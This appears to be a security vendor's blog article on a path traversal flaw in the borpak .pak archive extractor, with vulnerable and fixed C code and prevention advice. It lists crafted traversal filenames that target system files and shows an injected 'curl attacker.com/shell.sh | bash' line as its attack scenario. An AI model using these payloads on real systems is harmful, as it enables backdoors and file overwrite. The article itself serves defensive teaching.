What is path traversal?

Path traversal is a vulnerability where attackers manipulate file paths using sequences like `../` to access or write files outside intended directories, potentially compromising system files.

How do you prevent path traversal in C?

Validate paths by resolving them with `realpath()`, checking for traversal sequences (`../`, `..\\`, URL-encoded variants), and verifying the final path starts with the intended root directory.

What CWE is path traversal?

CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) covers path traversal vulnerabilities.

Is checking for `../` enough to prevent path traversal?

No, attackers use variations like `..\\`, `....//`, URL-encoded `%2e%2e%2f`, and Unicode representations. You must normalize paths and verify containment after resolution.

Can static analysis detect path traversal?

Yes, static analysis tools can detect path traversal by tracking tainted input from archive filenames to file operations and flagging missing sanitization.

How path traversal happens in C file

Introduction

The borpak tool handles extraction of .pak archive files, reading filenames from the archive and creating output files accordingly. However, a critical flaw at line 302 of tools/borpak/source/borpak.c allowed attackers to escape the intended extraction directory entirely. When extracting files, the code used memcpy to copy filenames directly from the archive without any sanitization—meaning a malicious archive containing ../../../etc/cron.d/malicious as a filename would write directly to that path.

This vulnerability is particularly dangerous because archive extraction is often performed with elevated privileges or in automated pipelines. A developer downloading and extracting a seemingly innocent game mod or resource pack could unknowingly compromise their entire system.

The Vulnerability Explained

When borpak extracts files from a .pak archive, it reads the filename stored in the archive header and uses it to construct the output path. The original code performed something like:

// Vulnerable pattern in borpak.c:302
char output_path[4096];
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
// pak_entry->filename comes directly from the archive with no validation
FILE *out = fopen(output_path, "wb");

The problem? The pak_entry->filename is attacker-controlled data read directly from the archive. An attacker crafting a malicious .pak file could include entries like:

../../../etc/passwd - Read system password file
../../home/user/.bashrc - Inject malicious shell commands
../../../etc/cron.d/backdoor - Install persistent backdoor
....//....//etc/shadow - Double-dot variation to bypass naive filters

Real Attack Scenario

Imagine a game modding community where users share .pak files containing textures and models. An attacker creates a mod called "HD_Textures.pak" with these entries:

textures/grass.png          (legitimate file)
textures/stone.png          (legitimate file)
../../../home/user/.bashrc  (malicious payload)

When a user runs borpak -x HD_Textures.pak -d ./mods/, the tool extracts the textures normally but also writes to .bashrc, injecting:

curl http://attacker.com/shell.sh | bash &

The next time the user opens a terminal, the backdoor executes.

The Fix

The fix implements a path_stays_within_root() validation function that ensures no extracted file can escape the intended directory. Here's the security logic added:

static int path_stays_within_root(const char *root, const char *filename)
{
    char combined[4096];

    snprintf(combined, sizeof(combined), "%s/%s", root, filename);

    /* Normalize: check if the combined path, when resolved, starts with root */
    char *rp = realpath(root, NULL);
    if (!rp) return 0;

    /* Manually resolve ../ components to check containment */
    char *res = realpath(combined, NULL);
    if (res) {
        int contained = (strncmp(res, rp, strlen(rp)) == 0);
        free(res);
        free(rp);
        return contained;
    }

    /* If file doesn't exist, do string-based check for traversal */
    int has_traversal = (strstr(filename, "../") != NULL ||
                         strstr(filename, "..\\") != NULL ||
                         strstr(filename, "%2e%2e") != NULL ||
                         strstr(filename, "....//") != NULL);
    free(rp);
    return !has_traversal;
}

Key Security Improvements

Path Resolution: Uses realpath() to resolve the combined path, eliminating symbolic links and ../ sequences
Containment Check: Verifies the resolved path starts with the extraction root directory
Pattern Detection: Falls back to string-based detection for traversal patterns when files don't yet exist
Multiple Encoding Coverage: Catches ../, ..\\ (Windows), URL-encoded %2e%2e, and double-dot variations like ....//

Before vs After

Before (Vulnerable):

// pak_entry->filename used directly - DANGEROUS
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
fopen(output_path, "wb");

After (Secure):

// Validate path stays within extraction directory
if (!path_stays_within_root(extract_dir, pak_entry->filename)) {
    fprintf(stderr, "Error: Path traversal detected in '%s'\n", pak_entry->filename);
    continue; // Skip malicious entry
}
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
fopen(output_path, "wb");

Prevention & Best Practices

1. Never Trust Archive Contents

Archive filenames, sizes, and metadata are all attacker-controlled. Treat them as untrusted input:

// Always validate before use
if (contains_path_traversal(filename) || strlen(filename) > MAX_FILENAME) {
    reject_entry();
}

2. Use Canonical Path Comparison

Always resolve paths to their canonical form before comparison:

char *canonical_root = realpath(extract_dir, NULL);
char *canonical_file = realpath(full_path, NULL);
if (strncmp(canonical_file, canonical_root, strlen(canonical_root)) != 0) {
    // Path escapes root - reject
}

3. Consider Allowlisting

For known archive formats, validate filenames against expected patterns:

// Only allow alphanumeric, dots, slashes (no backslashes or special chars)
if (!is_valid_filename_pattern(filename)) {
    reject_entry();
}

4. Use Secure Extraction Libraries

Modern libraries like libarchive include built-in protection against path traversal when configured correctly:

archive_read_extract_set_skip_file(a, dev, ino);
archive_read_extract(a, entry, ARCHIVE_EXTRACT_SECURE_NODOTDOT);

Key Takeaways

Archive filenames are attacker-controlled: The pak_entry->filename in borpak came directly from the archive without any validation
realpath() is essential for path validation: String-based checks alone miss edge cases; always resolve to canonical paths
Check multiple traversal encodings: Attackers use ../, ..\\, %2e%2e, ....//, and Unicode variants
Extraction tools need defense-in-depth: Even if one check fails, containment verification catches the escape
Regression tests with attack payloads are critical: The new test suite covers ../../../etc/passwd, ....// variations, and URL-encoded attacks

How Orbis AppSec Detected This

Source: Filename data read from .pak archive entries via memcpy in borpak.c
Sink: fopen() and file write operations at tools/borpak/source/borpak.c:302 using unsanitized paths
Missing control: No validation that constructed file paths stayed within the extraction directory
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
Fix: Added path_stays_within_root() function that validates paths using realpath() resolution and pattern detection for traversal sequences

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

Path traversal in archive extraction is a classic vulnerability that continues to affect modern codebases. The borpak fix demonstrates the proper approach: resolve paths to their canonical form, verify containment within the intended directory, and catch multiple encoding variations of traversal sequences. When handling any archive format—whether .pak, .zip, .tar, or others—always treat filenames as untrusted input and validate before writing.

cwe	CWE-22
fix	Validate extracted paths stay within the declared extraction root directory
risk	Arbitrary file write leading to system compromise
language	C
root cause	Filenames from .pak archives used directly without path sanitization
vulnerability	Path Traversal (Directory Traversal)

How path traversal happens in C file extraction and how to fix it

Answer Summary

Vulnerability at a Glance

Introduction

The Vulnerability Explained

Real Attack Scenario

The Fix

Key Security Improvements

Before vs After

Prevention & Best Practices

1. Never Trust Archive Contents

2. Use Canonical Path Comparison

3. Consider Allowlisting

4. Use Secure Extraction Libraries

Key Takeaways

How Orbis AppSec Detected This

Conclusion

References

Frequently Asked Questions

What is path traversal?

How do you prevent path traversal in C?

What CWE is path traversal?

Is checking for `../` enough to prevent path traversal?

Can static analysis detect path traversal?

View the Security Fix

Related Articles

How missing authorization enforcement happens in Node.js Express routers and how to fix it

How command injection happens in Java Runtime.exec() and how to fix it

How Algolia API key exposure happens in EJS templates and how to fix it

How unauthenticated endpoint exposure happens in Node.js Express and how to fix it

How unsigned auto-update code execution happens in Node.js Neutralinojs and how to fix it

How command injection via shell metacharacter escaping happens in Node.js and how to fix it